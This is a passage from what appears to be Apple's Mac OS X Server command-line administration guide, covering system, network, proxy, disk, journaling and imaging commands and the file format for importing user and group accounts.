-setWaitForStartupAfterPowerFailure seconds To see if the system is set to restart after a system freeze: $ sudo systemsetup -getrestartfreeze To set the system to restart after a system freeze: $ sudo systemsetup -setrestartfreeze (on|off) Power Management Settings You can use the pmset command to change a variety of power management settings, including: • Display dim timer • Disk spindown timer • System sleep timer • Wake on network activity • Wake on modem activity • Restart after power failure • Dynamic processor speed change • Reduce processor speed • Sleep computer on power button press For more information, see the pmset man page. Startup Disk Settings You can use the systemsetup command to view or change a server’s computer startup disk, which would otherwise be set using the Startup Disk pane of System Preferences. Viewing or Changing the Startup Disk To view the current startup disk: $ sudo systemsetup -getstartupdisk To view the available startup disks: $ sudo systemsetup -liststartupdisks To change the current startup disk: $ sudo systemsetup -setstartupdisk path Parameter Description seconds Must be a multiple of 30 seconds. LL2354.book Page 34 Monday, October 20, 2003 9:47 AM Chapter 4 Setting General System Preferences 35 Sharing Settings You can use the systemsetup command to view or change settings that would otherwise be set using the Sharing pane of System Preferences. Viewing or Changing Remote Login Settings You can use SSH to log in to a remote server if remote login is enabled. To see if the system is set to allow remote login: $ sudo systemsetup -getremotelogin To enable or disable remote login: $ sudo systemsetup -setremotelogin (on|off) or $ serversetup -enableSSH Telnet access is disabled by default because it isn’t as secure as SSH. You can, however, enable Telnet access. See “Using Telnet” on page 18. Viewing or Changing Apple Event Response To see if the system is set to respond to remote events: $ sudo systemsetup -getremoteappleevents To set the server to respond to remote events: $ sudo systemsetup -setremoteappleevents (on|off) International Settings You can use the serversetup command to view or change language settings that would otherwise be set using the Sharing pane of System Preferences. Viewing or Changing Language Settings To view the current primary language: $ serversetup -getPrimaryLanguage To view the installed primary language: $ serversetup -getInstallLanguage To change the install language: $ sudo serversetup -setInstallLanguage language To view the script setting: $ serversetup -getPrimaryScriptCode LL2354.book Page 35 Monday, October 20, 2003 9:47 AM 36 Chapter 4 Setting General System Preferences Login Settings Disabling the Restart and Shutdown Buttons To disable or enable the Restart and Shutdown buttons in the login dialog: $ sudo serversetup -setDisableRestartShutdown (0|1) 0 disables the buttons. 1 enables the buttons. To view the current setting: $ serversetup -getDisableRestartShutdown LL2354.book Page 36 Monday, October 20, 2003 9:47 AM 5 37 5 Network Preferences Commands you can use to change a server’s network settings. Network Interface Information This section describes commands you address to a specific hardware device (for example, en0) or port (for example, Built-in Ethernet). If you prefer to work with network port configurations following the approach used in the Network preferences pane of System Preferences, see the commands in “Network Port Configurations” on page 38. Viewing Port Names and Hardware Addresses To list all port names: $ serversetup -getAllPort To list all port names with their Ethernet (MAC) addresses: $ sudo networksetup -listallhardwareports To list hardware port information by port configuration: $ sudo networksetup -listallnetworkservices An asterisk in the results (*) marks an inactive configuration. To view the default (en0) Ethernet (MAC) address of the server: $ serversetup -getMacAddress To view the Ethernet (MAC) address of a particular port: $ sudo networksetup -getmacaddress (devicename|"portname") To scan for new hardware ports: $ sudo networksetup -detectnewhardware This command checks the computer for new network hardware and creates a default configuration for each new port. LL2354.book Page 37 Monday, October 20, 2003 9:47 AM 38 Chapter 5 Network Preferences Viewing or Changing MTU Values You can use these commands to change the maximum transmission unit (MTU) size for a port. To view the MTU value for a hardware port: $ sudo networksetup -getMTU (devicename|"portname") To list valid MTU values for a hardware port: $ sudo networksetup -listvalidMTUrange (devicename|"portname") To change the MTU value for a hardware port: $ sudo networksetup -setMTU (devicename|"portname") Viewing or Changing Media Settings To view the media settings for a port: $ sudo networksetup -getMedia (devicename|"portname") To list valid media settings for a port: $ sudo networksetup -listValidMedia (devicename|"portname") To change the media settings for a port: $ sudo networksetup -setMedia (devicename|"portname") subtype [option1] [option2] [...] Network Port Configurations Network port configurations are sets of network preferences that can be assigned to a particular network interface and then enabled or disabled. The Network pane of System Preferences stores and displays network settings as port configurations. Creating or Deleting Port Configurations To list existing port configuration: $ sudo networksetup -listallnetworkservices To create a port configuration: $ sudo networksetup -createnetworkservice configuration hardwareport To duplicate a port configuration: $ sudo networksetup -duplicatenetworkservice configuration newconfig To rename a port configuration: $ sudo networksetup -renamenetworkservice configuration newname To delete a port configuration: $ sudo networksetup -removenetworkservice configuration Activating Port Configurations To see if a port configuration is on: $ sudo networksetup -getnetworkserviceenabled configuration LL2354.book Page 38 Monday, October 20, 2003 9:47 AM Chapter 5 Network Preferences 39 To enable or disable a port configuration: $ sudo networksetup -setnetworkserviceenabled configuration (on|off) Changing Configuration Precedence To list the configuration order: $ sudo networksetup -listnetworkserviceorder The configurations are listed in the order that they’re tried when a network connection is established. An asterisk (*) marks an inactive configuration. To change the order of the port configurations: $ sudo networksetup -ordernetworkservices config1 config2 [config3] [...] TCP/IP Settings Changing a Server’s IP Address Changing a server’s IP address isn’t as simple as changing the TCP/IP settings. Address information is set throughout the system when you set up the server. To make sure that all the necessary changes are made, use the changeip command. To change a server’s IP address: 1 Run the changeip tool: $ changeip [(directory|-)] old-ip new-ip [old-hostname new-hostname] For more information or examples, see the man page. 2 Use the networksetup or serversetup command (or the Network pane of System Preferences) to change the server’s IP address in its network settings. 3 Restart the server. Parameter Description directory If the server is an Open Directory master or replica, or is connected to a directory system, you must include the path to the directory domain (directory node). For a standalone server, type “-” instead. old-ip The current IP address. new-ip The new IP address. old-hostname (optional) The current DNS host name of the server. new-hostname (optional) The new DNS host name of the server. LL2354.book Page 39 Monday, October 20, 2003 9:47 AM 40 Chapter 5 Network Preferences Viewing or Changing IP Address, Subnet Mask, or Router Address You can use the serversetup and networksetup commands to change a computer’s TCP/IP settings. Important: Changing a server’s IP address isn’t as simple as changing the TCP/IP settings. You must first run the changeip utility to make sure necessary changes are made throughout the system. See “Changing a Server’s IP Address” on page 39. To list TCP/IP settings for a configuration: $ sudo networksetup -getinfo "configuration" Example: $ networksetup -getinfo "Built-In Ethernet" Manual Configuration IP Address: 192.168.10.12 Subnet mask: 255.255.0.0 Router: 192.18.10.1 Ethernet Address: 1a:2b:3c:4d:5e:6f To view TCP/IP settings for port en0: $ serversetup -getDefaultinfo (devicename|"portname") To view TCP/IP settings for a particular port or device: $ serversetup -getInfo (devicename|"portname") To change TCP/IP settings for a particular port or device: $ sudo serversetup -setInfo (devicename|"portname") ipaddress subnetmask router To set manual TCP/IP information for a configuration: $ sudo networksetup -setmanual "configuration" ipaddress subnetmask router To validate an IP address: $ serversetup -isValidIPAddress ipaddress Displays 0 if the address is valid, 1 if it isn’t. To validate a subnet mask: $ serversetup -isValidSubnetMask subnetmask To set a configuration to use DHCP: $ sudo networksetup -setdhcp "configuration" [clientID] To set a configuration to use DHCP with a manual IP address: $ sudo networksetup -setmanualwithdhcprouter "configuration" ipaddress To set a configuration to use BootP: $ sudo networksetup -setbootp "configuration" LL2354.book Page 40 Monday, October 20, 2003 9:47 AM Chapter 5 Network Preferences 41 Viewing or Changing DNS Servers To view the DNS servers for port en0: $ serversetup -getDefaultDNSServer (devicename|"portname") To change the DNS servers for port en0: $ sudo serversetup -setDefaultDNSServer (devicename|"portname") server1 [server2] [...] To view the DNS servers for a particular port or device: $ serversetup -getDNSServer (devicename|"portname") To change the DNS servers for a particular port or device: $ sudo serversetup -setDNSServer (devicename|"portname") server1 [server2] [...] To list the DNS servers for a configuration: $ sudo networksetup -getdnsservers "configuration" To view the DNS search domains for port en0: $ serversetup -getDefaultDNSDomain (devicename|"portname") To change the DNS search domains for port en0: $ sudo serversetup -setDefaultDNSDomain (devicename|"portname") domain1 [domain2] [...] To view the DNS search domains for a particular port or device: $ serversetup -getDNSDomain (devicename|"portname") To change the DNS search domains for a particular port or device: $ sudo serversetup -setDNSDomain (devicename|"portname") domain1 [domain2] [...] To list the DNS search domains for a configuration: $ sudo networksetup -getsearchdomains "configuration" To set the DNS servers for a configuration: $ sudo networksetup -setdnsservers "configuration" dns1 [dns2] [...] To set the search domains for a configuration: $ sudo networksetup -setsearchdomains "configuration" domain1 [domain2] [...] To validate a DNS server: $ serversetup -verifyDNSServer server1 [server2] [...] To validate DNS search domains: $ serversetup -verifyDNSDomain domain1 [domain2] [...] LL2354.book Page 41 Monday, October 20, 2003 9:47 AM 42 Chapter 5 Network Preferences Enabling TCP/IP To enable TCP/IP on a particular port: $ serversetup -EnableTCPIP [(devicename|"portname")] If you don’t provide an interface, en0 is assumed. To disable TCP/IP on a particular port: $ serversetup -DisableTCPIP [(devicename|"portname")] If you don’t provide an interface, en0 is assumed. AppleTalk Settings Enabling and Disabling AppleTalk To enable AppleTalk on a particular port: $ serversetup -EnableAT [(devicename|"portname")] If you don’t provide an interface, en0 is assumed. To disable AppleTalk on a particular port: $ serversetup -DisableAT [(devicename|"portname")] If you don’t provide an interface, en0 is assumed. To enable AppleTalk on en0: $ serversetup -EnableDefaultAT To disable AppleTalk on en0: $ serversetup -DisableDefaultAT To make AppleTalk active or inactive for a configuration: $ sudo networksetup -setappletalk "configuration" (on|off) To check AppleTalk state on en0: $ serversetup -getDefaultATActive To see if AppleTalk is active for a configuration: $ sudo networksetup -getappletalk Proxy Settings Viewing or Changing FTP Proxy Settings To view the FTP proxy information for a configuration: $ sudo networksetup -getftpproxy "configuration" To set the FTP proxy information for a configuration: $ sudo networksetup -setftpproxy "configuration" domain portnumber LL2354.book Page 42 Monday, October 20, 2003 9:47 AM Chapter 5 Network Preferences 43 To view the FTP passive setting for a configuration: $ sudo networksetup -getpassiveftp "configuration" To enable or disable FTP passive mode for a configuration: $ sudo networksetup -setpassiveftp "configuration" (on|off) To enable or disable the FTP proxy for a configuration: $ sudo networksetup -setftpproxystate "configuration" (on|off) Viewing or Changing Web Proxy Settings To view the web proxy information for a configuration: $ sudo networksetup -getwebproxy "configuration" To set the web proxy information for a configuration: $ sudo networksetup -setwebproxy "configuration" domain portnumber To enable or disable the web proxy for a configuration: $ sudo networksetup -setwebproxystate "configuration" (on|off) Viewing or Changing Secure Web Proxy Settings To view the secure web proxy information for a configuration: $ sudo networksetup -getsecurewebproxy "configuration" To set the secure web proxy information for a configuration: $ sudo networksetup -setsecurewebproxy "configuration" domain portnumber To enable or disable the secure web proxy for a configuration: $ sudo networksetup -setsecurewebproxystate "configuration" (on|off) Viewing or Changing Streaming Proxy Settings To view the streaming proxy information for a configuration: $ sudo networksetup -getstreamingproxy "configuration" To set the streaming proxy information for a configuration: $ sudo networksetup -setstreamingproxy "configuration" domain portnumber To enable or disable the streaming proxy for a configuration: $ sudo networksetup -setstreamingproxystate "configuration" (on|off) Viewing or Changing Gopher Proxy Settings To view the gopher proxy information for a configuration: $ sudo networksetup -getgopherproxy "configuration" To set the gopher proxy information for a configuration: $ sudo networksetup -setgopherproxy "configuration" domain portnumber To enable or disable the gopher proxy for a configuration: $ sudo networksetup -setgopherproxystate "configuration" (on|off) LL2354.book Page 43 Monday, October 20, 2003 9:47 AM 44 Chapter 5 Network Preferences Viewing or Changing SOCKS Firewall Proxy Settings To view the SOCKS firewall proxy information for a configuration: $ sudo networksetup -getsocksfirewallproxy "configuration" To set the SOCKS firewall proxy information for a configuration: $ sudo networksetup -setsocksfirewallproxy "configuration" domain portnumber To enable or disable the SOCKS firewall proxy for a configuration: $ sudo networksetup -setsocksfirewallproxystate "configuration" (on|off) Viewing or Changing Proxy Bypass Domains To list the proxy bypass domains for a configuration: $ sudo networksetup -getproxybypassdomains "configuration" To set the proxy bypass domains for a configuration: $ sudo networksetup -setproxybypassdomains "configuration" [domain1] domain2 [...] AirPort Settings Viewing or Changing Airport Settings To see if AirPort power is on or off: $ sudo networksetup -getairportpower To turn AirPort power on or off: $ sudo networksetup -setairportpower (on|off) To display the name of the current AirPort network: $ sudo networksetup -getairportnetwork To join an AirPort network: $ sudo networksetup -setairportnetwork network [password] Computer, Host, and Rendezvous Name Viewing or Changing the Computer Name To display the server’s computer name: $ sudo systemsetup -getcomputername or $ sudo networksetup -getcomputername or $ serversetup -getComputername LL2354.book Page 44 Monday, October 20, 2003 9:47 AM Chapter 5 Network Preferences 45 To change the computer name: $ sudo systemsetup -setcomputername computername or $ sudo networksetup -setcomputername computername or $ sudo serversetup -setComputername computername To validate a computer name: $ serversetup -verifyComputername computername Viewing or Changing the Local Host Name To display the server’s local host name: $ serversetup -getHostname To change the server’s local host name: $ sudo serversetup -setHostname hostname Viewing or Changing the Rendezvous Name To display the server’s Rendezvous name: $ serversetup -getRendezvousname To change the server’s Rendezvous name: $ sudo serversetup -setRendezvousname rendezvousname The command displays a 0 if the name was changed. Note: If you use the Server Admin GUI application to connect to a server using its Rendezvous name, then change the server’s Rendezvous name, you will need to reconnect to the server the next time you open the Server Admin application. LL2354.book Page 45 Monday, October 20, 2003 9:47 AM LL2354.book Page 46 Monday, October 20, 2003 9:47 AM 6 47 6 Working With Disks and Volumes Commands you can use to prepare, use, and test disks and volumes. Mounting and Unmounting Volumes You can use the mount_afp command to mount an AFP volume. For more information, type man mount_afp to see the man page. Mounting Volumes You can use the mount command with parameters appropriate to the type of file system you want to mount, or use one of these file-system-specific mount commands: • mount_afp for Apple File Protocol (AppleShare) volumes • mount_cd9660 for ISO 9660 volumes • mount_cddafs for CD Digital Audio format (CDDA) volumes • mount_hfs for Apple Hierarchical File System (HFS) volumes • mount_msdos for PC MS-DOS volumes • mount_nfs for Network File System (NFS) volumes • mount_smbfs for Server Message Block (SMB) volumes • mount_udf for Universal Disk Format (UDF) volumes • mount_webdav for Web-based Distributed Authoring and Versioning (WebDAV) volumes For more information, see the related man pages. Unmounting Volumes You can use the umount command to unmount a volume. For more information, see the man page. Checking for Disk Problems You can use the diskutil or fsck command (fsck_hfs for HFS volumes) to check the physical condition and file system integrity of a volume. For more information, see the related man pages. LL2354.book Page 47 Monday, October 20, 2003 9:47 AM 48 Chapter 6 Working With Disks and Volumes Monitoring Disk Space When you need more vigilant monitoring of disk space than the log rolling scripts provide, you can use the diskspacemonitor command-line tool. It lets you monitor disk space and take action more frequently than once a day when disk space is critically low, and gives you the opportunity to provide your own action scripts. diskspacemonitor is disabled by default. You can enable it by opening a Terminal window and typing sudo diskspacemonitor on. You may be prompted for your password. Type man diskspacemonitor for more information about the command- line options. When enabled, diskspacemonitor uses information in a configuration file to determine when to execute alert and recovery scripts for reclaiming disk space: • The configuration file is /etc/diskspacemonitor/diskspacemonitor.conf. It lets you specify how often you want to monitor disk space and thresholds to use for determining when to take the actions in the scripts. By default, disks are checked every 10 minutes, an alert script executed when disks are 75% full, and a recovery script executed when disks are 85% full. To edit the configuration file, log in to the server as an administrator and use a text editor to open the file. See the comments in the file for additional information. • By default, two predefined action scripts are executed when the thresholds are reached. The default alert script is /etc/diskspacemonitor/action/alert. It runs in accord with instructions in configuration file /etc/diskspacemonitor/alert.conf. It sends email to recipients you specify. The default recovery script is /etc/diskspacemonitor/action/recover. It runs in accord with instructions in configuration file /etc/diskspacemonitor/recover.conf. See the comments in the script and configuration files for more information about these files. • If you want to provide your own alert and recovery scripts, you can. Put your alert script in /etc/diskspacemonitor/action/alert.local and your recovery script in /etc/diskspacemonitor/action/recovery.local. Your scripts will be executed before the default scripts when the thresholds are reached. To configure the scripts on a server from a remote Mac OS X computer, open a Terminal window and log in to the remote server using SSH. LL2354.book Page 48 Monday, October 20, 2003 9:47 AM Chapter 6 Working With Disks and Volumes 49 Reclaiming Disk Space Using Log Rolling Scripts Three predefined scripts are executed automatically to reclaim space used on your server for log files generated by • Apple file service • Windows service • Web service • Web performance cache • Mail service • Print service The scripts use values in the following configuration files to determine whether and how to reclaim space: • The script /etc/periodic/daily/600.daily.server runs daily. Its configuration file is /etc/diskspacemonitor/daily.server.conf. • The script /etc/periodic/weekly/600.weekly.server is intended to run weekly, but is currently empty. Its configuration file is /etc/diskspacemonitor/weekly.server.conf. • The script /etc/periodic/monthly/600.monthly.server is intended to run monthly, but is currently empty. Its configuration file is /etc/diskspacemonitor/monthly.server.conf. As configured, the scripts specify actions that complement the log file management performed by the services listed above, so don’t modify them. All you need to do is log in as an administrator and use a text editor to define thresholds in the configuration files that determine when the actions are taken: • the number of megabytes a log file must contain before its space is reclaimed • the number of days since a log file’s last modification that need to pass before its space is reclaimed Specify one or both thresholds. The actions are taken when either threshold is exceeded. There are several additional parameters you can specify. Refer to comments in the configuration files for information about all the parameters and how to set them. The scripts ignore all log files except those for which at least one threshold is present in the configuration file. To configure the scripts on a server from a remote Mac OS X computer, open a Terminal window and log in to the remote server using SSH. Then open a text editor and edit the scripts. You can also use the diskspacemonitor command-line tool to reclaim disk space. LL2354.book Page 49 Monday, October 20, 2003 9:47 AM 50 Chapter 6 Working With Disks and Volumes Managing Disk Journaling Checking to See if Journaling is Enabled You can use the mount command to see if journaling is enable on a volume. To see if journaling is enabled: $ mount Look for journaled in the attributes in parentheses following a volume. For example: /dev/disk0s9 on / (local, journaled) Turning on Journaling for an Existing Volume You can use the diskutil command to enable journaling on a volume without affecting existing files on the volume. Important: Always check the volume for disk errors using the fsck_hfs command before you turn on journaling. To enable journaling: $ diskutil enableJournal volume Example $ mount /dev/disk0s9 on / (local, journaled) /dev/disk0s10 on /Volumes/OS 9.2.2 (local) $ sudo fsck_hfs /dev/disk0s10/ ** /dev/rdisk0s10 ** Checking HFS plus volume. ** Checking extents overflow file. ** Checking Catalog file. ** Checking Catalog hierarchy. ** Checking volume bitmap. ** Checking volume information. ** The volume OS 9.2.2 appears to be OK. $ diskutil enableJournal /dev/disk0s10 Allocated 8192K for journal file. Journaling has been enabled on /dev/disk0s10 $ mount /dev/disk0s9 on / (local, journaled) /dev/disk0s10 on /Volumes/OS 9.2.2 (local, journaled) Parameter Description volume The volume name or device name of the volume. LL2354.book Page 50 Monday, October 20, 2003 9:47 AM Chapter 6 Working With Disks and Volumes 51 Enabling Journaling When You Erase a Disk You can use the newfs_hfs command to set up and enable journaling when you erase a disk. To enable journaling when erasing a disk: $ newfs_hfs -J -v volname device Disabling Journaling To disable journaling: $ diskutil disableJournal volume Erasing, Partitioning, and Formatting Disks You can use the diskutil command to partition, erase, or format a disk. For more information, see the man page. Setting Up a Case-Sensitive HFS+ File System You can use the diskutil tool to format a drive for case-sensitive HFS. Note: Volumes you format as case-sensitive HFS are also journaled. To format a Mac OS Extended volume as case-sensitive HFS+: $ sudo diskutil eraseVolume "Case-sensitive HFS+" newvolname volume For more information, see the man page for diskutil. Parameter Description volname The name you want the new disk volume to have. device The device name of the disk. Parameter Description volume The volume name or device name of the volume. Parameter Description newvolname The name given to the reformatted, case-sensitive volume. volume The path to the existing volume to be reformatted. For example, /Volumes/HFSPlus LL2354.book Page 51 Monday, October 20, 2003 9:47 AM 52 Chapter 6 Working With Disks and Volumes Imaging and Cloning Volumes Using ASR You can use Apple Software Restore (ASR) to copy a disk image onto a volume or prepare existing disk images with checksum information for faster copies. ASR can perform file copies, in which individual files are restored to a volume unless an identical file is already there, and block copies, which restore entire disk images. The asr utility doesn’t create the disk images. You can use hdiutil to create disk images from volumes or folders. You must run ASR as the root user or with sudo root permissions. You cannot use ASR on read/write disk images. To image a boot volume: 1 Install and configure Mac OS X on the volume as you want it. 2 Restart from a different volume. 3 Make sure the volume you’re imaging has permissions enabled. 4 Use hditutil to make a read-write disk image of the volume. 5 Mount the disk image. 6 Remove cache files, host-specific preferences, and virtual memory files. You can find example files to remove on the asr man page. 7 Unmount the volume and convert the read-write image to a read-only compressed image. hdiutil convert -format UDZO pathtoimage -o compressedimage 8 Prepare the image for duplication by adding checksum information: sudo asr -imagescan compressedimage To restore a volume from an image: $ sudo asr -source compressedimage -target targetvolume -erase See the asr man page for command syntax, limitations, and image preparation instructions. LL2354.book Page 52 Monday, October 20, 2003 9:47 AM 7 53 7 Working With Users and Groups Commands you can use to set up and manage users and groups in Mac OS X Server. Creating Server Administrator Users You can use the serversetup command to create administrator users for a server. To create regular users, see “Importing Users and Groups” on page 54. To create a user: $ serversetup -createUser fullname shortname password The name, short name, and password must be typed in the order shown. If the full name includes spaces, type it in quotes. The command displays a 1 if the full name or short name is already in use. To create a user with a specific UID: $ serversetup -createUserWithID fullname shortname password userid The name, short name, password, and UID must be typed in the order shown. If the full name includes spaces, type it in quotes. The command displays a 1 if the full name, short name, or UID is already in use or if the UID you specified is less than 100. To create a user with a specific UID and home directory: $ serversetup -createUserWithIDIP fullname shortname password userid homedirpath The name, short name, password, and UID must be typed in the order shown. If the full name includes spaces, type it in quotes. The command displays a 1 if the full name, short name, or UID is already in use or if the UID you specified is less than 100. LL2354.book Page 53 Monday, October 20, 2003 9:47 AM 54 Chapter 7 Working With Users and Groups Importing Users and Groups You can use the dsimportexport command to import user and group accounts. Note: Despite its name, dsimportexport can’t be used to export user records. The utility is in /Applications/Server/Workgroup Manager.app/Contents/Resources. For information on the formats of the files you can import, see “Creating a Character- Delimited User Import File” on page 55. $ dsimportexport (-g|-s|-p) file directory user password (O|M|I|A) [options] To import users and groups: 1 Create a file containing the accounts to import, and place it in a location accessible from the importing server. You can export this file from an earlier version of Mac OS X Server or AppleShare IP 6.3, or create your own character-delimited file. See “Creating a Character-Delimited User Import File” on page 55. Open Directory supports up to 100,000 records. For local NetInfo databases, make sure the file contains no more than 10,000 records. 2 Log in as the administrator of the directory domain into which you want to import accounts. Parameter Description -g|-s|-p You must specify one of these to indicate the type of file you’re importing: -g for a character-delimited file -s for an XML file exported from Users & Groups in Mac OS X Server version 10.1.x -p for an XML file exported from AppleShare IP version6.x file The path of the file to import. directory The path to the Open Directory node where the records will be added. user The name of the directory administrator. password The password of the directory administrator. O|M|I|A Specifies how user data is handled if a record for an imported user already exists in the directory: O: Overwrite the matching record. M: Merge the records. Empty attributes in the directory assume values from the imported record. I: Ignore imported record and leave existing record unchanged. A: Append data from import record to existing record. options Additional command options. To see available options, execute the dsimportexport command with no parameters. LL2354.book Page 54 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 55 3 Open the Terminal application and type the dsimportexport command. The tool is located in /Applications/Utilities/Workgroup Manager.app/Contents/Resources. To include the space in the path name, precede it with a backslash (\). For example: /Applications/Utilities/Workgroup\ Manager.app/Contents/Resources /dsimportexport -h 4 If you want, use the createhomedir tool to create home directories for imported users. See “Creating a User’s Home Directory” on page 63. Creating a Character-Delimited User Import File You can create a character-delimited file by hand, using a script, or by using a database or spreadsheet application. The first record in the file, the record description, describes the format of each account record in the file. There are three options for the record description: • Write a full record description • Use the shorthand StandardUserRecord • Use the shorthand StandardGroupRecord The other records in the file describe user or group accounts, encoded in the format described by the record description. Any line of a character-delimited file that begins with “#” is ignored during importing. Writing a Record Description The record description specifies the fields in each record in the character-delimited file, specifies the delimiting characters, and specifies the escape character that precedes special characters in a record. Encode the record description using the following elements in the order specified, separating them with a space: • End-of-record indicator (in hex notation) • Escape character (in hex notation) • Field separator (in hex notation) • Value separator (in hex notation) • Type of accounts in the file (DSRecTypeStandard:Users or DSRecTypeStandard:Groups) • Number of attributes in each account record • List of attributes For user accounts, the list of attributes must include the following, although you can omit UID and PrimaryGroupID if you specify a starting UID and a default primary group ID when you import the file: • RecordName (the user’s short name) • Password • UniqueID (the UID) • PrimaryGroupID • RealName (the user’s full name) LL2354.book Page 55 Monday, October 20, 2003 9:47 AM 56 Chapter 7 Working With Users and Groups In addition, you can include • UserShell (the default shell) • NFSHomeDirectory (the path to the user’s home directory on the user’s computer) • Other user data types, described under “User Attributes” on page 57 For group accounts, the list of attributes must include • RecordName (the group name) • PrimaryGroupID (the group ID) • GroupMembership Here is an example of a record description: 0x0A 0x5C 0x3A 0x2C DSRecTypeStandard:Users 7 RecordName Password UniqueID PrimaryGroupID RealName NFSHomeDirectory UserShell Here is an example of a record encoded using the above description: jim:Adl47E$:408:20:J. Smith, Jr., M.D.:/Network/Servers/somemac/Homes/jim:/bin/csh The record consists of values, delimited by colons. Use a double colon (::) to indicate a value is missing. Here is another example, which shows a record description and user records for users whose passwords are to be validated using the Password Server. The record description should include a field named dsAttrTypeStandard:AuthMethod, and the value of this field for each record should be dsAuthMethodStandard:dsAuthClearText: 0x0A 0x5C 0x3A 0x2C dsRecTypeStandard:Users 8 dsAttrTypeStandard:RecordName dsAttrTypeStandard:AuthMethod dsAttrTypeStandard:Password dsAttrTypeStandard:UniqueID dsAttrTypeStandard:PrimaryGroupID dsAttrTypeStandard:Comment dsAttrTypeStandard:RealName dsAttrTypeStandard:UserShell skater:dsAuthMethodStandard\:dsAuthClearText:pword1:374:11:comment: Tony Hawk:/bin/csh mattm:dsAuthMethodStandard\:dsAuthClearText:pword2:453:161:: Matt Mitchell:/bin/tcsh As these examples illustrate, you can use the prefix dsAttrTypeStandard: when referring to an attribute, or you can omit the prefix. Using the StandardUserRecord Shorthand When the first record in a character-delimited import file contains StandardUserRecord, the following record description is assumed: 0x0A 0x5C 0x3A 0x2C DSRecTypeStandard:Users 7 RecordName Password UniqueID PrimaryGroupID RealName NFSHomeDirectory UserShell LL2354.book Page 56 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 57 An example user account looks like this: jim:Adl47E$:408:20:J. Smith, Jr., M.D.:/Network/Servers/somemac/Homes/jim:/bin/csh Using the StandardGroupRecord Shorthand When the first record in a character-delimited import file contains StandardGroupRecord, the following record description is assumed: 0x0A 0x5C 0x3A 0x2C DSRecTypeStandard:Groups 4 RecordName Password PrimaryGroupID GroupMembership Here is an example of a record encoded using the description: students:Ad147:88:jones,alonso,smith,wong User Attributes The following table lists standard XML data structures for attributes in user records. Attribute Format Sample values RecordName: A list of names associated with a user; the first is the user’s short name, which is also the name of the user’s home directory Important: All attributes used for authentication must map to RecordName. First value: ASCII characters A–Z, a–z, 0–9, _,- Second value: UTF-8 Roman text Dave David Mac DMacSmith Non-zero length, 1 to 16 values. Maximum 255 bytes (85 triple-byte to 255 single-byte characters) per instance. First value must be 1 to 30 bytes for clients using Macintosh Manager, or 1 to 8 bytes for clients using Mac OS X version 10.1 and earlier. RealName: A single name, usually the user’s full name; not used for authentication UTF-8 text David L. MacSmith, Jr. Non-zero length, maximum 255 bytes (85 triple-byte to 255 single-byte characters). UniqueID: A unique user identifier, used for access privilege management Signed 32-bit ASCII string of digits 0–9 Range is 100 to 2,147,483,648. Values below 100 are typically used for system accounts. Zero is reserved for use by the system. Normally unique among entire population of users, but sometimes can be duplicated. Warning: A non-integer value is interpreted as 0, which is the UniqueID of the root user. PrimaryGroupID: A user’s primary group association Unsigned 32-bit ASCII string of digits 0–9 Range is 1 to 2,147,483,648. Normally unique among entire population of group records. If blank, 20 is assumed. NFSHomeDirectory: Local file system path to the user’s home directory UTF-8 text /Network/Servers/example/Users/ K-M/Tom King Non-zero length. Maximum 255 bytes. LL2354.book Page 57 Monday, October 20, 2003 9:47 AM 58 Chapter 7 Working With Users and Groups HomeDirectory: The location of an AFP-based home directory Structured UTF-8 text <home_dir> <url> afp://server/sharepoint </url> <path> usershomedirectory </path> </home_dir> In the following example, Tom King’s home directory is K-M/Tom King, which resides beneath the share point directory, Users: <home_dir> <url> afp://example.com/Users </url> <path> K-M/Tom King </path> </home_dir> HomeDirectoryQuota: The disk quota for the user’s home directory Text for the number of bytes allowed If the quota is 10MB, the value will be the text string 1048576. MailAttribute: A user’s mail service configuration (refer to “Mail Attributes in User Records” on page 60 for information on individual fields in this structure) Structured text <dict> <key>kAttributeVersion</key> <string>Apple Mail 1.0</string> <key>kAutoForwardValue</key> <string>user@example.com</string> <key>kIMAPLoginState</key> <string>IMAPAllowed</string> <key>kMailAccountLocation</key> <string>domain.example.com</string> <key>kMailAccountState</key> <string>Enabled</string> <key>kNotificationState</key> <string>NotificationStaticIP</string> <key>kNotificationStaticIPValue</key> <string>[1.2.3.4]</string> <key>kPOP3LoginState</key> <string>POP3Allowed</string> <key>kSeparateInboxState</key> <string>OneInbox</string> <key>kShowPOP3InboxInIMAP</key> <string>HidePOP3Inbox</string> </dict> PrintServiceUserData A user’s print quota statistics UTF-8 XML plist, single value Attribute Format Sample values LL2354.book Page 58 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 59 MCXFlags: If present, MCXSettings is loaded; if absent, MCXSettings isn’t loaded; required for a managed user. UTF-8 XML plist, single value MCXSettings: A user’s managed preferences UTF-8 XML plist, single value AdminLimits The privileges allowed by Workgroup Manager to a user that can administer the directory domain UTF-8 XML plist, single value Password: The user’s password UNIX crypt Picture: File path to a recognized graphic file to be used as a display picture for the user UTF-8 text Maximum 32,676 bytes. Comment: Any documentation you like UTF-8 text John is in charge of product marketing. UserShell: The location of the default shell for command-line interactions with the server Path name /bin/tcsh /bin/sh None (this value prevents users with accounts in the directory domain from accessing the server remotely via a command line) Non-zero length. Authentication Authority: Describes the user’s authentication methods, such as Open Directory or crypt password; not required for a user with only a crypt password; absence of this attribute signifies legacy authentication (crypt with Authentication Manager, if it’s available). ASCII text Values describe the user’s authentication methods. Can be multivalued (for example, basic and ShadowHash). Each value has the format vers; tag; data (where vers and data may be blank). Crypt password: ;basic; Open Directory authentication: ;ApplePasswordServer; HexID, server’s public key IPaddress:port Shadow password (local directory domain only): ;ShadowHash; AuthenticationHint: Text set by the user to be displayed as a password reminder UTF-8 text Your guess is as good as mine. Maximum 255 bytes. Attribute Format Sample values LL2354.book Page 59 Monday, October 20, 2003 9:47 AM 60 Chapter 7 Working With Users and Groups Mail Attributes in User Records The following table lists the standard XML data structures for a user mail attribute, part of a standard user record. MailAttribute field Description Sample values AttributeVersion A required case-insensitive value that must be set to AppleMail 1.0. <key> kAttributeVersion </key> <string> AppleMail 1.0 </string> MailAccountState A required case-insensitive keyword describing the state of the user’s mail. It must be set to one of these values: Off, Enabled, or Forward. <key> kMailAccountState </key> <string> Enabled </string> POP3LoginState A required case-insensitive keyword indicating whether the user is allowed to access mail via POP. It must be set to one of these values: POP3Allowed or POP3Deny. <key> kPOP3LoginState </key> <string> POP3Deny </string> IMAPLoginState A required case-insensitive keyword indicating whether the user is allowed to access mail using IMAP. It must be set to one of these values: IMAPAllowed or IMAPDeny. <key> kIMAPLoginState 